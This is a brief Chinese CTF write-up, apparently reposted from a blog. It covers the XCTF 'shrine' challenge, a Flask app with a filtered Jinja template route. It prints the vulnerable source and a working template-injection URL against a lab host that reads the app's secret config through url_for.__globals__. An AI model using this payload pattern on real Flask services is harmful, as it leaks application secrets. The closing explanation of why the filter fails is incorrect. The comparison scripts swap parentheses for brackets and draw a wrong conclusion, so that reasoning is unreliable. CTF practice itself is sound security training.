題目

解題

1、訪問目標，發現有一段代碼

import flask import osapp = flask.Flask(__name__)app.config['FLAG'] = os.environ.pop('FLAG')@app.route('/') def index():return open(__file__).read()@app.route('/shrine/<path:shrine>') def shrine(shrine):def safe_jinja(s):s = s.replace('(', '').replace(')', '')blacklist = ['config', 'self']return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + sreturn flask.render_template_string(safe_jinja(shrine))if __name__ == '__main__':app.run(debug=True)

2、根據源碼該題可能是flask模板注入漏洞

該代碼過濾了括號和config、self關鍵字
對該模板注入了解不多，直接上payload
payload

http://111.200.241.244:64667/shrine/{{ url_for.__globals__['current_app'].config['FLAG']}}

為什么沒有過濾呢？看下面的對比就知道了，為了更好地對比，我將括號轉空變為轉中括號[]
代碼1：

# -*- coding: UTF-8 -*- s="/shrine/{{ url_for.__globals__['current_app'].config['FLAG']}}" s = s.replace('(', '[').replace(')', ']') blacklist = ['config', 'self'] print(''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s)

代碼2：

# -*- coding: UTF-8 -*- s="/shrine/{{ url_for.__globals__['current_app'].(config)['FLAG']}}" s = s.replace('(', '[').replace(')', ']') blacklist = ['config', 'self'] print(''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s)

由此可見只要出現單括號或雙括號，是不會對config進行過濾的

總結

以上是生活随笔為你收集整理的XCTF-Web-高手区-shrine的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。